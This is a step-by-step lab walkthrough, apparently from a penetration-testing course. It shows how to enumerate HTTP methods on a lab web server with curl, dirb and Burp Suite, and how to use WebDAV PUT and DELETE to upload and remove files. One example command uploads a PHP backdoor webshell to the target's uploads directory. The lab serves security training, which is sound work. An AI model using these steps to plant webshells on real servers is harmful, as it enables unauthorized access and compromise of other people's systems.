Lab 01 – Web - HTTP Method Enumeration

Overview

This lab focuses on enumerating and testing HTTP methods on a web server. You will learn to interact with various web pages of the application to discover supported HTTP methods and explore the potential for unauthorized actions like file uploads and deletions.

Tasks

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at demo.ine.local.

Objective: To understand and identify the HTTP methods supported by different web pages within a web application

Tools

The best tools for this lab are:

• Burp Suite

• Curl

• DiRB

Solutions

In this exercise, we will take a look at how to use Burp Suite and curl to enumerate the HTTP Methods supported by various web pages. Inspecting the web application.

Inspecting the web application

There are two new links which can be followed from the home page. The login link on the navigation bar and the blog post. The login link redirects to "login.php" and the Blog link redirects to "post.php".

1

Following Links: Click on the login Link

URL: http://demo.ine.local/login.php

The login page contains a form.

2

Identify the endpoint which processes the form fields. Right-click on the web page and click on the view source

The parameters are passed in a POST request to the same "login.php" page.

3

Login to the web application with the provided credentials.

Username: john Password: password

After login instead of the login link "Welcome John" message is displayed.

4

Follow the remaining link. Click on the blog post

The Web pages which can be accessed by following the links are index.php, login.php and post.php.

Using dirb to identify hidden directories

Commands:

dirb http://demo.ine.local

The directories which are present on the server are css, img, js, mail, uploads and vendor.

Interacting with the home page with CURL

1

Sending GET request

Commands:

curl -X GET demo.ine.local

2

Sending HEAD request

Commands:

curl -I demo.ine.local

3

Sending OPTIONS request

Commands:

curl -X OPTIONS demo.ine.local -v

The supported methods are GET, HEAD and OPTIONS. Accessing the web page should produce an error.

4

Sending POST Request

Commands:

curl -X POST demo.ine.local

5

Sending PUT Request

Commands:

curl -XPUT demo.ine.local

Interacting with the login.php page with CURL

1

Sending OPTIONS Request

Commands:

curl -X OPTIONS demo.ine.local/login.php -v

The allowed methods include: GET,POST,HEAD,OPTIONS.

2

Sending POST Request

Commands:

curl -X POST demo.ine.local/login.php

Unlike the home page (index.php). The login page supports POST method.

3

Passing the username and password to the login.php page

Command:

curl -X POST demo.ine.local/login.php -d "name=john&password=password" -v

The login page returned a different response than before. The response contains 302 redirects.

Interacting with the post.php page with CURL

1

Sending OPTIONS request

Commands:

curl -X OPTIONS demo.ine.local/post.php -v

Similar to login.php, post.php has GET, POST, HEAD and OPTIONS methods enabled.

Interacting with the uploads directory

1

Checking the content of /uploads directory

URL: http://demo.ine.local/uploads

2

Sending OPTIONS request to /uploads directory

Commands:

curl -X OPTIONS demo.ine.local/uploads/
curl -X OPTIONS demo.ine.local/uploads/ -v

The Webdav module is enabled on the Apache Server, Webdav module allows file upload via the PUT method.

3

Uploading a file with the PUT method

Commands:

echo "Hello World" > hello.txt
curl demo.ine.local/uploads/ --upload-file hello.txt
## Example
curl http://demo.ine.local/uploads/ --upload-file /usr/share/webshells/php/simple-backdoor.php 

4

Checking the content of /uploads directory

The file "hello.txt" was uploaded successfully.

5

Using the DELETE method to delete the file

Command:

curl -XDELETE demo.ine.local/uploads/hello.txt

6

Checking the content of /uploads directory

The file was deleted successfully.

Interacting with the web page with Burp Suite

1

Set the FoxyProxy to use the burp proxy. Click on the Fox icon and select "Burp Suite"

2

Start burp suite. Reload the page and the request will be intercepted

3

Sending request to Repeater

Repeater Tab:

4

Sending GET Request

Repeater Tab:

Response Tab:

5

Sending HEAD Request

Response Tab:

6

Sending OPTIONS request

Response Tab:

7

Sending POST request

Response Tab:

POST method is not allowed.

8

Sending a POST request to login.php with incorrect login credentials

Response Tab:

200 OK responses are received.

9

Sending POST request with valid login credentials

Response Tab:

The login credentials were correct and as a result, 302 responses were received to index.php.

10

Uploading a file with the PUT method

Response Tab:

The file was uploaded Successfully.

Check the files in the/uploads directory.

Response Tab:

The file "hello.txt" was uploaded successfully.

Checking the Content of the uploaded file.

Response Tab:

11

Deleting the File

Response Tab:

The file was deleted. Check the files in the uploads directory.

Response Tab:

References

• Curl

• Burp Suite

• Dirb